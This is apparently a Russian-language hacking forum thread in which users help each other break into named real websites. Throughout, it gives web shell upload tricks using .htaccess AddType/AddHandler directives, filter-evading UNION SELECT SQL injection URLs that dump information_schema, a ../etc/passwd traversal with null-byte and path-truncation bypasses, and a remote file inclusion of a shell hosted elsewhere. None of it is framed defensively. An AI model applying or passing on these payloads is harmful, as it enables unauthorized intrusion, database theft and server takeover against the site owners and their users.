еще вопрос. Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request. когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает. Есть какие то еще варианты?
Уйма. Можешь юзать морковку, панголини, safe3, круизер в конце концов. Но лично я пришел к выводу, что лучше рук ничего ещё не написали)
ты имеешь в виду разрешить выполнение php файлов как картинку? типа Code: AddType application/x-httpd-jpg .php
попробуй залить phpinfo(); и скажи что выйдет если нет, то да, попробуй AddType application/x-httpd-jpg .ololo и лей шелл.ololo
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+ помогите обойти фильтр jecka, php_flag engine 1 AddHandler application/x-httpd-php .ololo
самое смешное, что и .htaccess как txt обрабатывается, т.е. при переходе на "картинку" вылетает содержимое htaccess..странно
http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,table_name,3,4,5,6,78,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.`tables`+limit+1,1--+ и т.д. %20 ток убери)
Так точно. Но при: 1'+order+by+1+-- Выдает: - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1 А при: 1'/**/order/**/by/**/1/**/-- - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1 +GROUP+BY+1+-- Также не помогает.
Всем добрый вечер. Суть такова - через админку заливаю шелл. Расширение .php без проблем пропускается, но при обращению к этому скрипту вылетает 500 ошибка. Далее пытался залить в эту же директорию .htaccess, чтобы попробовать порулить Апачем в пределах этой директории, но беда в том, что скрипт дописывает к началу любого загружаемого файла определенные символы, и получается что-то типа x_1.htaccess. Что можно придумать?
тоже нет. not found! Так же указано. Бага формата не ?id=1, a id/1' При запросе ?id=1 страница та, но ошибка отсутствует.
народ а тут, нужно отсеять окончание, нул байт не помогает http://proeveryday.ru/index.php?id=../etc/passwd%00 тут читал https://forum.antichat.ru/thread98525.html но нифига неполучилось, мб недопонял подскажите как правильно
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
site.com/page.php=about.php выдаёт about.php на сервере site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте Можно как-то залить шелл на site.com?
